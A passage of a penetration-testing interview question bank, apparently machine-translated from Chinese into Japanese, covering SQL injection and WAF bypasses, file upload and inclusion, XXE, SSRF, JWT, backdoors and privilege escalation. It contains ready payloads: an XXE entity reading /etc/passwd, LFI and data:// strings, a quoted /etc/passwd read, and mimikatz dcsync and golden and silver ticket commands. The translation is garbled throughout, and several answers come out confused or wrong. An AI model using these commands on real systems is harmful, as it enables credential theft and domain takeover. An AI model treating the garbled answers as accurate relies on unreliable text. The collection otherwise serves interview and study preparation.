アップロードの切り詰めバイパス

IIS6/7/7.5 解析の脆弱性、nginx の低バージョン解析の脆弱性

ファイルインクルードのバイパス

質問31:認証コード関連の活用ポイント

答え:

検証コードの再利用

認証コードは識別可能です

認証コードが無効です

検証コードDDOS

質問 32: Cookie について何をテストしますか?

答え:

SQLインジェクション

xss

許可のバイパス

機密情報が漏洩した

質問 33: ビジネス ロジックの脆弱性の種類をいくつか挙げてください。

答え:

任意のユーザーのパスワードのリセット

SMS 爆撃

注文金額の変更

パスワードを忘れた場合のバイパス

悪意のある投票のブラッシング

検証コードの再利用

問題 34: 簡単な説明ファイルに脆弱性が含まれています

答え:

include()、require()、その他の関数など、ファイルインクルード関数を呼び出す場合、ファイル名とパスは厳密に制限されません。

質問 35: ビジネス ロジックの脆弱性とユーザーによる任意のパスワード リセットの例は何ですか?また、それらの原因は何ですか?

答え:

一般ユーザーが管理ユーザーのパスワードをリセットする

一般ユーザーが一般ユーザーのパスワードをリセットする

ユーザー固有のトークンが設定されていないため、不正アクセスが発生します。

質問 36: ペネトレーションテスト中に、zip ファイルのみをアップロードできる機能が見つかりました。どのようなアイデアが考えられますか?

答え:

シェル圧縮アップロード、プログラム自己解凍型 getshell

getshell の脆弱性を解析してみる

ファイルインクルードの脆弱性を探しています

トロイの木馬フィッシング マネージャー

質問 37: aspx トロイの木馬が asp よりも大きな権限を持っているのはなぜですか?

答え:

aspx は .net テクノロジを使用しますが、IIS ではデフォルトでサポートされていません。ASPX は .net フレームワークに依存する必要があります。ASP は単なるスクリプト言語です。侵入する場合、asp トロイの木馬には通常ゲスト権限が与えられます。APSX トロイの木馬には通常ユーザー権限が与えられます。

質問 38: ログイン ページを 1 つだけにするためのアイデアは何ですか?

答え:

SQLインジェクション、ユニバーサルパスワード

ブルートフォースクラッキング

許可のバイパス

ディレクトリスキャン

機密情報が漏洩した

質問 39: どのリクエスト ヘッダーが有害ですか?

答え:

クッキーの注入

ユーザーエージェントインジェクション

X-Forwarded-For インジェクション

リファラーインジェクション

質問40: 水平/垂直/不正アクセスの違いについて話しますか?

答え:

水平オーバーライド: 一般ユーザーは、一般ユーザーにアクセスする権限をオーバーライドします。

垂直オーバーライド: 一般ユーザーは、管理ユーザーにアクセスする権限をオーバーライドします。

不正アクセス: 権限制御が緩いため、ログインせずにログイン済みのユーザー ページにアクセスされる

質問41: xssとは何ですか? 保存された xss を実行する危険性と原則

答え:

ストレージ型、リフレクション型、DOM型

保存された XSS とは、アプリケーションが Web リクエストを通じて信頼できないデータを取得し、データに XSS コードが含まれているかどうかを確認せずにデータベースに保存することを意味します。

保存された XSS ハザード:

ユーザーのCookieを盗む

XSSフィッシング攻撃

XSS ワーム攻撃

キーログを取得する

ユーザー情報を取得する

スクリーンショットを取得する

質問 42: ホストが侵入された疑いがあるのですが、ログはどこで確認すればよいですか?

答え:

システムログインログ

サービスアクセスログ

ウェブサイトのログ

データベースログ

質問 43: Python で一般的に使用される標準ライブラリ

答え:

正規表現

タイムモジュール時間

乱数ランダム

オペレーティング システム インターフェイス OS

科学技術計算数学

ネットワークリクエストのurllib

http库リクエスト

クローラーライブラリ Scrapy

マルチスレッドライブラリのスレッド化

質問44: reverse_tcpとbind_tcpの違いは何ですか?

答え:

reverse_tcp: 攻撃マシンはポートと IP を設定します。テストマシン上でペイロードが実行され、攻撃マシンの IP のポートに接続されます。このとき、攻撃マシンがポートを監視すると、テストマシンが言い換えれば、制御されたマシンは積極的に私たちに接続します。

bind_tcp: 攻撃マシンがポート(LPORT)を設定し、テストマシンでペイロードを実行して攻撃マシンがアクセスできるようにポートを開く、つまり制御マシンに能動的に接続してreverse_tcpを利用するものです。より安全であり、通常はファイアウォールによって検出されません。

質問 45: oauth 認証プロセス中にどのような問題が発生する可能性がありますか?また、その結果としてどのような種類の脆弱性が発生する可能性がありますか?

答え:

CSRF

redirect_uri 検証は厳密ではありません

間違ったパラメータの受け渡し

質問 46: CDN を持つ Web サイトの実際の IP を取得する方法

答え:

グローバルping

履歴分析レコードのクエリ

phpinfo などのファイルを調査します。

コマンド実行を使用してサーバーまたは DNSlog に接続します

Webサイトの構成を探しています

第 2 レベルのドメイン名を介して

ネットワーク全体をスキャンしてタイトルを一致させます

質問 47: クロスドメインを実現するにはどうすればよいですか?

答え:

jsonp

CORS クロスドメイン リソース共有

クロスドメインリクエストをプロキシする

HTML5 postMessage メソッド

サブドメイン全体で document.domain を変更する

HTML5 WebSocketプロトコルに基づく

http://document.xxx + iframe

質問 48: jsonp クロスドメインと CORS クロスドメインの違いは何ですか?

答え:

jsonp ブラウザのサポートは良好ですが、CORS は IE9 以下のブラウザをサポートしていません

jsonp は GET のみをサポートし、CORS はすべての種類の HTTP リクエストをサポートします。jsonp はリクエストを 1 回だけ送信し、CORS は複雑なリクエストを 2 回送信します。

質問49: アルゴリズムは? 並べ替えについて学習しましたか?

答え:

バブルソート

選択ソート

挿入ソート

質問 50: SSRF 脆弱性の悪用?

答え:

ローカルファイルの読み込み

サービス検出、ポートスキャン

イントラネット Redis、mysql、fastcgi およびその他のサービスを攻撃する

• 使用されるプロトコルは次のとおりです: http/s、file、gopher、tftp、dict、ssh、telnet

質問 51: 一般的なバックドア手法は?

答え:

ウィンドウズ:

レジストリが自動的に起動します

シフトバックドア

リモートコントロールソフトウェア

ウェブシェル

管理ユーザーの追加

シャドウユーザー

スケジュールされたタスク

DLLハイジャック

レジストリハイジャック

MBR バックドア

WMI バックドア

管理者のパスワード記録

Linux:

SSHバックドア

SUID バックドア

Crontab のスケジュールされたタスク

PAM バックドア

管理者アカウントを追加する

ルートキット

質問 52: open_basedir のアクセス ディレクトリ制限をバイパスするにはどうすればよいですか?

答え:

コマンド実行機能バイパスの使用

symlink() 関数を使用してバイパスします

glob疑似プロトコルバイパス

質問 53: PHP コード監査でよくある問題は何ですか?

答え:

どのパラメータの結合方法でも SQL インジェクションが発生する可能性があります (これはよくあることです)

グローバル変数登録による変数カバレッジ

フィルタリングされていない fwrite パラメータによってコードが実行される

権限の確認漏れによるバックグラウンド機能へのアクセス

任意のファイルをアップロードするためのインターフェース

unserialize 逆シリアル化の脆弱性

問54:赤青対決で、青チームが赤チームに反撃する場面や姿勢は?

答え:

釣り、ハニーポット、アリソード RCE

質問 55: Linux のスケジュールされたタスク、ハッカーはスケジュールされたタスクを隠すために何をしますか?

答え:

一時タスク: at、バッチ コマンド

質問 56: Redis 認証なしでシェルを取得する一般的な方法は何通りありますか?

答え:

Web絶対パス書き込みシェル

サーバー権限を取得するための SSH 公開キーを書き込みます

マスタースレーブコピーgetshell

質問 57: JWT の攻撃方法は何ですか? (ヘッダー、ペイロード、署名)

答え:

暗号化アルゴリズムを空に設定すると、認証がバイパスされます。

弱いキーの子供パラメータの悪用: 任意のファイル読み取り、SQL インジェクション、コマンド インジェクション

署名が検証されず、コンテンツが再エンコードされました

質問 58: JAVA ミドルウェアの脆弱性、例としてはどのようなものがありますか?

答え:

JBoss デシリアライゼーション

WebLogicの逆シリアル化

Tomcat の任意のファイル書き込み、弱いパスワード + バックグラウンド getshell

質問 59: DNS テイクアウトはどのような脆弱性に使用できますか?

答え:

SQLブラインドインジェクション

エコーなしでコマンドを実行

XXE タッチ タイピング

SSRFタッチタイピング

質問 60: HTTP のみでは、JS による Cookie 情報の読み取りが禁止されていますが、これを回避して Cookie を取得するにはどうすればよいですか?

答え:

ログインページのハイジャックフィッシングバイパス

質問 61: ミドルウェアの脆弱性の概要は?

答え:

ここでは、よく悪用される脆弱性についてのみ書きます。

IIS:

IIS6.0 PUT の脆弱性

IIS6.0のリモートコード実行の脆弱性

IIS6.0 解析の脆弱性 IIS により .net の短いファイル名の脆弱性が発生する

IIS7.0/7.5解析の脆弱性

アパッチ:

未知の拡張機能解析の脆弱性

調整エラーによって引き起こされる解析の脆弱性とディレクトリ トラバーサル

Nginx:

構成エラーによる解析の脆弱性とディレクトリ トラバーサル

トムキャット:

設定エラーによる任意のコード実行および任意のファイル書き込みの脆弱性

弱いパスワード + 管理バックグラウンド war パッケージのデプロイ getshell manager/html

管理バックエンドでの弱いパスワードの爆発

Jボス:

5.x/6.x デシリアライゼーションの脆弱性 (CVE-2017-12149)

JMXInvokerServlet の逆シリアル化

EJBInvokerServlet の逆シリアル化

JMX コンソールへの不正アクセス

弱いパスワード + 管理バックグラウンド戦争パッケージの展開 getshell

ウェブロジック:

XMLDecoder デシリアライゼーションの脆弱性 (CVE-2017-10271 および CVE-2017-3506)

wls9_async_response、wls-wsat 逆シリアル化のリモート コード実行の脆弱性 (CVE-2019-2725)

WLS コア コンポーネントの逆シリアル化コマンド実行の脆弱性 (CVE-2018-2628)

弱いパスワード + 管理バックグラウンド戦争パッケージの展開 getshell

質問 62: Windows システムと Linux システムの特権を昇格するという考えについて話してください。

答え:

ウィンドウズ:

データベース権限昇格: mysql、sqlserver

サードパーティ ソフトウェアの権限昇格: serv-u DLL ハイジャック

システムカーネルオーバーフローの脆弱性権限昇格:CVEシリーズ

Linux:

sudo権限昇格

suid 権限の昇格

Redis カーネル権限の昇格

質問 63: Python にはどのようなフレームワークがあり、それらにどのような脆弱性が発生していますか?

答え:

Django、Flask、Scrapy Django の任意のコード実行

フラスコテンプレートの注入

質問64: 小規模プログラムの浸透と通常の浸透の違い

答え:

侵入プロセスは変更されておらず、依然としてパケットをキャプチャし、侵入のためのパラメータを変更することについてのみ行われます。

違いは、ミニ プログラムはパッケージをローカルにダウンロードし、逆回復ツールを使用して逆コンパイルできることです。

質問 65: アプリ自体の脆弱性テストの 4 つの主要なコンポーネント

答え:

アクティビティコンポーネント:

アクティビティはブラウザ可能なカスタム プロトコルをバインドします

ActivityManager の脆弱性

サービスコンポーネント:

権限昇格、サービス拒否攻撃

ブロードキャスト レシーバー コンポーネント:

不適切な権限管理

BroadcastReceiver エクスポートの脆弱性

動的登録ブロードキャスト コンポーネントが脆弱性を明らかにする

コンテンツプロバイダーコンポーネント:

読み取りおよび書き込み権限の脆弱性

コンテンツ プロバイダーの SQL インジェクションの脆弱性

プロバイダー ファイル ディレクトリ トラバーサルの脆弱性

質問 66: IDS/IPS 保護の原則とバイパスのアイデア

答え:

原理:

IDS はネットワーク層で動作し、バイパス モードで展開されます。ネットワーク トラフィックをキャプチャして分析することで攻撃を検出します。IPS は通常、ネットワーク層もバイパスします。ブロック機能を備えた IDS として理解できます。IDS のアップグレード バージョンです ( IDS によって検出される攻撃もあります)、ネットワーク層とアプリケーション層をカバーできる、ブロックしているデバイスにブロック動作を実行するように通知するデバイス連携モード)

バイパス:

TCP フラグメンテーション: 2 つの TCP パケットに分割

IPフラグメンテーション:原理はTCPフラグメンテーションと同じですが、パケット損失が深刻です

プログラムのバグ/パフォーマンスの問題: 大量の無効なパケットの送信、IPS パフォーマンスの消費

TCP 状態の偽造: ステートフル追跡ベースの IPS のバイパス

IPV6 バイパス: IPV6 アドレス バイパスの使用

質問67: jsonのcsrfの活用

答え:

XMLHttpRequest とフェッチを使用して JSON リクエストを構築し、Flash のクロスドメインと 307 ジャンプを使用して http カスタム ヘッダー制限をバイパスします

質問 68: json 形式のデータ パケットを使用してテストできる脆弱性は何ですか?

答え:

csrf jsonハイジャックxss

質問 69: xxe 脆弱性の原理と利用方法を簡単に説明してください

答え:

原理:

XML 外部エンティティの挿入: アプリケーションが XML 入力を解析するときに、外部エンティティの参照が許可されると、悪意のあるコンテンツが構築され、脆弱性が発生する可能性があります。

利用:

DTD ドキュメント タイプの定義

DTD 内部宣言<!DOCTYPE ルート要素[要素宣言]>

DTD 外部参照 <!DOCTYPE ルート要素名 SYSTEM "外部 DTD の URI">

パブリックDTDへの参照<!DOCTYPEルート要素名 PUBLIC "DTD識別名" "パブリックDTDのURI">

実在物

<?xml バージョン="1.0" エンコーディング="utf-8"?>

<!DOCTYPE ルート [

    <!ENTITY × 「ファーストパラム!」

    <!ENTITY y "第 2 パラメータ!">

    <!ENTITY xxe SYSTEM "file:///etc/passwd">

]>

<root><x>&x;</x><y>&y;</y><xxe>&xxe;</xxe></root

インターネットからの写真

質問 70: イントラネット サーバー上の情報を収集するにはどうすればよいですか?

答え:

スクリプトを使用して収集: ポート情報、サービス情報

システム コマンド収集: ドメイン内のユーザーは、ドメイン コマンドを使用して、ドメイン情報、ネット グループ "ドメイン ユーザー" /domain などを収集できます。

ポートスキャンツールのフルスキャン

ローカル情報収集: 管理パスワード、管理者 IP を確認するためのログイン ログ、サービス パスワードの収集、ネットワーク セグメント情報の表示、履歴レコードの表示

イントラネット DNS ドメイン転送の脆弱性

質問 71: イントラネットの境界層にあるマシンがダウンした場合、イントラネット上の他のマシンを検出するにはどうすればよいですか?

答え:

まずプロキシを使用して、イントラネット reg、ew などに入力します。

2 番目に、管理者 IP、ポート サービス、アカウント パスワード、ルーティング情報、ネットワーク セグメント情報などの情報をローカルで収集します。

3 番目の拡張機能は、収集されたネットワーク セグメントに侵入し、SMB、MYSQL、SQLserver、ftp、telnet などの共通サービスを使用することです。

軽量のスクリプトまたはスキャナを使用してスキャンしますが、移動が大きすぎるため、管理者によって簡単に発見される可能性があるため、通常はこれを実行しません。

質問72:イントラネット金紙幣と銀紙幣の違いと利用方法

答え:

ゴールデンノート:

攻撃者がドメイン コントローラーへの管理者アクセス権を取得すると、Mimikatz を使用して KRBTGT アカウントのパスワード ハッシュを抽出できます。

mimikatz ログ「lsadump::dcsync /domain:test.local /user:krbtgt」

チケットを生成する

kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.karibi

/admin: 偽のユーザー名

/domain: ドメイン名

/sid: SID 値。最後以降の値が削除されることに注意してください。

/krbtgt: krbtgtのHASH値

/ticket: 生成されたチケット名 //メモリに書き込まれるコマンドではありません!

通常のドメイン アカウント。ゴールデン チケットを使用してドメイン管理アカウントを作成します。

#kerberos::purge を模倣します         

mimikatz # kerberos::ptt Administrator.karibi //チケットをメモリにインポート

この時点で、ドメイン管理アカウントは正常に作成されます。

シルバーノート:

SID と NTLM を取得する

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt

偽札

kerberos::golden /domain:cyberpeace.com /sid:S-1-5-21-2718660907-658632824-2072795563 /target:scene.abcd.com /service:cifs /rc4:9a68826fdc2811f20d1f73a471ad7b9a /user:test /ptt

//説明書

kerberos::golden /domain:<ドメイン名> /sid:<ドメイン SID> /target:<ターゲット サーバーのホスト名> /service:<サービス タイプ> /rc4:<NTLM ハッシュ> /user:<ユーザー名> /ptt

サービス名の偽造

ドメイン管理アカウントの取得に成功しました

ディレクトリ \\scene.cyberpeace.com\c$

ゴールドチケットとシルバーチケットの違い:

取得する権限が異なります

ゴールデン チケット: 任意の Kerberos アクセスを取得できる偽の TGT

紙幣: 偽造 ST、CIFS などの指定されたサービスのみにアクセス可能

認証プロセスが異なります

ゴールデン チケット: KDC と対話しますが、AS とは対話しません

紙幣: 異なる KDC 間の対話とサーバーへの直接アクセス

暗号化方式が違う

ゴールデン チケット: krbtgt NTLM ハッシュで暗号化

紙幣: サービス アカウントの NTLM ハッシュによって暗号化されます

面接の質問の採点

質問1: サーバーから受信したレスポンスからSQLインジェクションは大まかに何種類に分類できますか? (5点)

答え:

基于报错的SQL注入,联合查询,堆叠注入,SQL盲注(布尔型注入,延时注入,报错注入)

报错注入(常见的十种报错函数:答出前三个即可

extractvalue(),

floor(),

updatexml(),

exp(),

polygon(),

multipoint(),

multilinestring(),

linestring(),

multipolygon(),

GeometryCollection())

问题2:sql如何写shell以及单引号被过滤怎么办?(10分)

答案:

先判断是否满足如下条件:

secure_file_priv参数是否为空,root权限,file权限,GPC关闭,知道相关网站路径,相关读写函数:

写文件函数:into outfile, into dumpfile

1. outfile函数可以导出多行,而dumpfile只能导出一行数据outfile函数在将数据写到文件里时有特殊的格式转换

2. dumpfile则保持原数据格式

读文件函数:load_file()

判断是否有相关的写入权限,如果有则使用相关的文件写函数向网站路径进行写码操作,存在单引号过滤,可以将一句话的内容进行16进制的编码操作或者尝试利用宽字节。如果没有过滤的话,直接使用sqlmap –os-shell.

问题3:sql注入常见的绕过方式(10)

答案:

常见的关键字过滤:大小写,双写绕过,进制转换

空格绕过: 内联注释

and,or绕过:符号替代

问题4:mysql5.0以下和5.0以上的版本区别(5)

答案:

MySQL5.0版本增加了baiStored procedures、Views、Cursors、Triggers、XA transactions的支持,

增加了INFORATION_SCHEMA系统数据库。

问题5:xss大致分为几种类型以及每种类型之间的区别?(5分)

答案:

存储型,反射型,DOM型

存储型:

是将相关的xss攻击代码直接存储到数据库中,只需要用户访问相关界面就会触发相关代码执行。不需要用户去主动触发。

反射型:

関連する xss コードは、関連するページの応答に反映されます。これには、関連するユーザーがアクティブにトリガーする必要があり、ユーザーはデータを送信します。

DOM タイプ:

ページの DOM ノードを変更して xss を作成する

質問 6: xss 10 から防御する方法

答え:

送信されたすべてのコンテンツをフィルタリングし、URL 内のパラメータをフィルタリングし、スクリプトの実行を引き起こす関連コンテンツをフィルタリングして、動的に除外します。

ページに出力されるコンテンツをエンコードする最も信頼性の高い方法は、すべての出力ポイントを出力する前に HTML コードをフィルタリングすることです。成熟した JS ライブラリを使用してフィルタリングし、独自の規則ルールを作成することをお勧めします。

エラーを起こしやすい。

質問 7: ファイルアップロードの一般的な使用方法 (10 点)

質問 1: 一般的なバイパス方法

答え:

フロントエンド js 検証: js を無効にするか、burp でパッケージを直接変更します。

ファイル タイプの検証: http ヘッダーのコンテンツ タイプ、MIME タイプを変更します。

ブラックリスト: 特別な解析可能なサフィックスのアップロード、.htaccess、.user.ini のアップロード、サフィックスの大文字と小文字の区別、ドットのバイパス、スペース、::$DATA のバイパス、解析の脆弱性との連携、二重サフィックス名のバイパス

ホワイトリスト: MIME バイパス、%00 トランケーション、0x00 トランケーション、0x0a トランケーション

ファイル コンテンツの検証: ファイル ヘッダー チェック、getimagessize() のブレークスルー、exif_imagetype() のブレークスルー、セカンダリ レンダリング

その他:条件付き競争

関連ミドルウェアの解析脆弱性: iis6.0、iis7.0、iis7.5 解析脆弱性、Apache 解析脆弱性、nginx 解析脆弱性

質問 2: サフィックス名の解決方法を決定する

答え:

ファズテスト

質問 8: ファイルアップロードの 1 文バイパス方法 10

答え:

トロイの木馬をバイパスする一般的な方法を 1 文でまとめる

珍しい関数を使用してコマンドを実行する

キーワードケース、ダイナミックスプライシング

特殊文字の干渉

エンコードバイパスなど

質問 9: 一般的な危険な機能のコマンド インジェクション (5 点)

答え:

PHP の機能:

• システム

• 実行

• パススルー

• シェル_exec

• ポペン

• proc_open

• 評価

• 主張する

• パススルー

• pcntl_exec

• call_user_func_array

• 関数の作成

質問 10: PHP の一般的なコマンド区切り文字 (5 点)

答え:

%0a, \r, \n, ;, &, &&, |, ||

質問 11: 一般的なバイパス方法 (スペース バイパス、ブラックリスト) (10 点)

質問 1: スペースを回避する方法

答え:

• ${IFS} ({} は切り捨てに使用されます) たとえば、cat$IFS2 は変数名として IFS2 とみなされます。さらに、最後に $ を追加すると切り捨て効果が生じる可能性があります。$9 は現在のシステム シェル プロセスの 9 番目のパラメーターの保持者であり、常に空の文字列であるため、通常は $9 が使用されます。

問題 2: ブラックリストのバイパス

答え:

• 行継続文字 \

• 一重引用符は使用できません

• ワイルドカード *fla*

• ?

• コネクタ cat /etc/pass'w'd

質問 12: ファイルに脆弱性が含まれています (10 点)

問題 1: ファイルに脆弱性フォーム、一般的な PHP 関数が含まれています

<?php include("inc/" . $_GET['file']); ?>

答え:

1. include (組み込みプロセス中にエラーが発生した場合、エラーが報告されますが、後続のステートメントの実行には影響しません)

2. include_once (一度だけ含める)

3. require (組み込みプロセス中にコードエラーが発生しました。後続のコードは実行されません)

4. require_once (1 回だけ含まれます)

質問 2: 一般的な封入フォーム

答え:

1. 同じディレクトリには、現在のディレクトリに直接追加された関連ファイルが含まれています。

2. ディレクトリトラバーサル?ファイル=../../../../../../../../../var/lib/locate.db

3. ログ挿入?file=../../../../../../../../../var/log/apache/error.log

質問 13: PHP 疑似関連付けの一般的な使用上の推奨事項と関連する使用条件 (10 点)

答え:

一般的なプロトコルに名前を付けるだけです

1.php://input

ポストデータストリームを取得可能

利用条件:

allow_url_include=オン

allow_url_fopen-オフ/オン

説明書:

ファイル =php://input

POST:phpinfo();

2.php://フィルター

指定したファイルのソースコードを取得できますが、include関数と組み合わせるとphp://filterストリームがphpファイルとして実行されます。したがって、通常は実行されないようにコーディングします。したがって、任意のファイル読み取りが発生します

利用条件:

allow_url_fopen=オフ/オン

allow_url_include=オフ/オン

説明書;

?file=php://filter/read=convert.base64-encode/resource=phpinfo.php

3.zip://

圧縮パッケージ内のファイルにアクセスできます。include 関数と組み合わせると、zip:// ストリームが PHP ファイルとして実行されます。これにより、任意のファイルの実行が可能になります。同様のタイプには、zlib:// および bzip2:// があります。

利用条件:

zip 圧縮パッケージである必要があります (ファイル形式が zip である限り、接尾辞は関係ありません)。

allow_url_fopen=オフ/オン

allow_url_include=オフ/オン

php >=5.2

説明書:

zip://[圧縮パッケージへの絶対パス]#[圧縮パッケージ内のファイル]

?file=zip://D:\zip.zip%23phpinfo.txt

4.phar://

zip:// と同様に、絶対パスと相対パスの両方を使用できます。

利用条件:

zip 圧縮パッケージである必要があります (ファイル形式が zip である限り、接尾辞は関係ありません)。

allow_url_fopen=オフ/オン

allow_url_include=オフ/オン

php >=5.2

説明書:

zip://[圧縮パッケージへの絶対パス]#[圧縮パッケージ内のファイル]

?file=zip://D:\zip.zip/phpinfo.php (zip:// との違いは、一方が # でもう一方が / であることです)

5.データ://

php://input にも似ています

利用条件:

allow_url_fopen=オン

allow_url_include=オン

説明書:

?file=data://,<?php phpinfo();

?file=data://text/plain,<php phpinfo();

?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

?file=data:text/plain,<php phpinfo();

?file=データ:テキスト/プレーン;base64,PD9waHAgcGhwaW5mbygpPz4=

質問 14: 一般的なビジネス ロジックの脆弱性が発生する場所 (10 点)

答え:

1. 取引種類

支払った価格を変更する

支払いステータスを変更する

購入数量を負の数に変更します

金額を負の数に変更します

成功したリクエストを再生する

同時データベースロックの不適切な処理

2. アカウント

登録: 登録を上書きし、ユーザー名を繰り返し、登録をたどって既存のアカウントを推測します。

ログイン: クレデンシャルスタッフィング、アカウントハイジャック、アカウントパスワードを試行してアカウントをロックする

パスワードの取得: ユーザー名をリセットします。パスワードのリセット後、新しいパスワードは返却パッケージ内にあります。トークン検証ロジックはフロントエンドにあります。X-Forwarded-Host は正しく処理されません。

パスワード変更: 許可なくパスワードを変更します。パスワード変更時に古いパスワードの検証は行われません。

苦情: ID 偽造、ロジックバイパス

情報クエリ: 不適切な権限制限により不正なクエリが発生したり、ユーザー情報 ID が推測されてトラバーサルが発生したりする可能性があります。

3. 認証コード

認証コード:認証コードは再利用可能

検証コードは予測可能です

確認コードの強度が十分ではありません

確認コードには期限がない、または有効期限が長い

確認コードの推測数に制限はありません

検証コードが特別なパラメーターを渡しているか、バイパスするパラメーターを渡していません。

確認コードは返送されたパッケージから直接取得できます。

確認コードが更新されないか無効です

認証コードの数には制限があります

検証コードはパケットで返されます

Cookie バイパスを変更する

返品パッケージのバイパスを変更する

検証コードはクライアント側で生成または検証されます

検証コードはOCRまたは機械学習を使用した認識が可能

認証コードはSMS/電子メール攻撃に使用されます

質問 15: 不正な脆弱性にはいくつかの種類があります (10 点)

答え:

不正アクセス

水平方向のオーバーライド:

攻撃者は、自分と同じ権限を持つユーザーのリソースにアクセスできる

権限タイプは変更されず、ID は変更されます

垂直方向のオーバーライド:

低レベルの攻撃者が高レベルのユーザーのリソースにアクセスできる

権限 ID は変更されませんが、タイプは変更されます

クロスオーバーライド:

権限IDの変更、タイプの変更

質問 16: テスト対象の局を受け取ったらどうしますか (10 点)

答え:

1. 情報収集

1) サーバー関連情報 (実際のIP、システムタイプ、バージョン、オープンポート、WAFなど)

2) Web サイトの指紋認証 (CMS、CDN、証明書などを含む)、DNS 記録

3) c. Whois情報、名前、記録、電子メール、逆チェック用の電話番号(電子メールはソーシャルワーカーデータベースに失われ、ソーシャルワーカーが準備するなど)

4) サブドメイン名収集、サイドサイト、Cセグメントなど

5) Google ハッキング対象の検索、PDF ファイル、ミドルウェアのバージョン、脆弱なパスワードのスキャンなど。

6) Web サイトのディレクトリ構造をスキャンして、バックエンド、Web サイトのバナー、テスト ファイル、バックアップなどの機密ファイルを漏洩します。

7) 伝送プロトコル、一般的な脆弱性、exp、github ソースコードなど。

2. 脆弱性マイニング

1) Web サイトを参照して、サイズ、機能、特徴などを確認します。

2) ポート、弱いパスワード、ディレクトリなどをスキャンし、応答ポート上で rsync、heartbleed、mysql、ftp、ssh の弱いパスワードなどの脆弱性検出を実行します。

3) XSS、SQLインジェクション、アップロード、コマンドインジェクション、CSRF、Cookieセキュリティ検出、機密情報、通信データ送信、ブルートフォースクラッキング、任意ファイルアップロード、不正アクセス、不正アクセス、ディレクトリトラバーサル、ファイルインクルード、リプレイ攻撃(SMSボム攻撃) )、サーバーの脆弱性の検出、最後に不足しているスキャン ツールの使用などです。

3. 脆弱性の悪用と権限昇格

1) mysq| 権限昇格、serv-u 権限昇格、oracle 権限昇格

2) Windows のオーバーフロー権限昇格

3) Linux の汚れた牛、特権を昇格させるカーネルの脆弱性

4. テストデータのクリアとレポートの出力

1) ログとテストデータのクリーニング

2) 要約、修復計画を含む侵入テストレポートの出力

5. 再テスト

1) 新たな脆弱性の有無を検証・発見し、レポートを出力し、アーカイブする

質問 17: ウェブログで多数のドメイン名または IP アクセスが見つかった場合はどうなりますか (5 点)

答え:

DDO またはクローラー

ネットワーク保護に関する面接の質問の概要

質問 1:ファイルのアップロード、ブラックリストとホワイトリストをバイパスするにはどうすればよいですか?

答え:

接尾辞、大文字と小文字::$DATA 特殊記号、二重書き込み (不正な形式のファイル名))

ホワイト リストの方が安全です。アップロードを許可するファイル タイプを変更してください。%00 truncation、0x00 truncation、char (0) MIME

質問 2 : SQLインジェクションの原則

答え:

SQL インジェクション攻撃は、悪意のある SQL クエリまたは add ステートメントをアプリケーションの入力パラメーターに挿入し、バックグラウンドの SQL サーバーで解析して実行することによる攻撃です。現在、ハッカーがデータベースを攻撃するために使用しています。最も一般的な攻撃の 1 つです。使用された方法。

質問3 : SQL攻撃手法

答え:

ユニオンクエリ、ブールブラインドインジェクション、エラーインジェクション、スタックインジェクション、遅延、セカンダリインジェクション

質問 4: SQLインジェクションの脆弱性の原則

答え:

Web サイトのデータ フィルタリングは厳密ではなく、ユーザーが入力したデータに過度に依存し、ユーザーが入力した悪意のあるデータをフィルタリングせず、ユーザーが入力したデータを SQL ステートメントとして無条件に実行するため、SQL インジェクションが発生します。脆弱性、誕生

質問 5:共通関数を挿入するときのエラー報告

答え:

updatexml()、floor()、extractvalue()

質問 6: mysqlにデフォルトで存在するデータベースはどれですか。また、注入時に頻繁に使用されますか?

答え:

情報スキーマ

質問 7: 時間ベースのブラインド インジェクションの特徴は何ですか? よく使う機能は?あなたは何の影響を受けやすいですか?

答え:

特徴: 時間ベースのブラインドインジェクションページには明らかなエコーはなく、ページの更新時間の長さに基づいて構築されたステートメントが正しいかどうかのみ判断できます。

よく使用される関数: sleep 関数、if 条件文など。

ネットワーク変動の影響を受けやすい

質問 8: ブール ブラインド インジェクションの特徴は何ですか?よく使用される関数は何ですか?

答え:

機能: ページ上の正しいと不正確の 2 つのステータスに基づいて、構築されたステートメントが正しいかどうかを判断します。

よく使用される関数:

質問 9: SQLインジェクション一般的に使用される終了文字

答え:

一重引用符 ' 二重引用符 " 一重引用符括弧 ') 二重引用符括弧 ")

質問 10: SQLインジェクション一般的なインジェクションタイプは何ですか?

答え:

1. 閉じ文字の有無で分類すると、文字型と整数型になります。

2. データの送信方法別に分類すると、post 型と get 型が一般的です。

3. インジェクションモードに従って細分化すると、一般的なものは、ジョイントクエリインジェクション、エラーレポートインジェクション、ブールブラインドインジェクション、タイムブラインドインジェクション、ワイドバイトインジェクションなどです。

質問11: ワイドバイトインジェクションの使用条件

答え:

使用条件: データベースは gbk 文字セットを使用し、Web サイトは引用符をバックスラッシュと引用符にエスケープします。

GBK の 2 バイト エンコーディングでは、中国語の文字を表すために 2 バイトが使用されます。%df を使用すると、閉じた文字のバックスラッシュ エスケープをバイパスできます。

質問 12: WAFの姿勢に関するSQLインジェクション(すべてを説明する必要はありません。いくつかだけ説明してください)

答え:

大文字と小文字の混合バイパス機能

バイパスの理由: サーバー側の検出中に大文字と小文字の区別がオンになっていない

複数のキーワードのバイパス

バイパスできる理由: サーバーが機密文字を検出すると、それらを空の文字に置き換えます。

フォーム: Unionion selselectec

エンコーディングバイパス

バイパスできる理由: エンコードされた形式のキーワードがサーバー側で検出されないか、厳密には検出されません。

エンコードタイプ:16進エンコード、URLエンコード、Unicodeエンコード

コメントバイパス

回避できる理由: サーバー側はコメント内の文字列を厳密に検出しないか、検出しません。

コメント形式: format: /**/、/*!*/、/*!12345*/、#、-- など。

同等の機能またはコマンドのバイパス

回避できる理由: サーバー側のリストが不完全であり、フィルタリングが厳密ではありません。

同等の関数形式:

Mysql の説明:Union Distinct、updatexml、Extractvalue、Floor

文字列インターセプト関数:mid、substr、substring、left、reverse

文字列接続関数: concat、group_concat、concat_ws

文字列変換: char、hex、unhex

カンマを置換:limit 1 offset 0,mid(version() from 1 for 1)

等号を次のように置き換えます。

特殊記号のバイパス

バイパスの理由: データベースでは効果は同じですが、サーバー側では制限がありません

形状:

科学表記と 1e0 = 1e0

空白文字 %0a %a0 %0b %20 %09 バッククオート `table_name`

括弧 select * from (test.admin)

コンビネーションバイパス

バイパスできる理由: サーバーは複数の場所を検出するため、複数のバイパス方法の組み合わせが必要です。
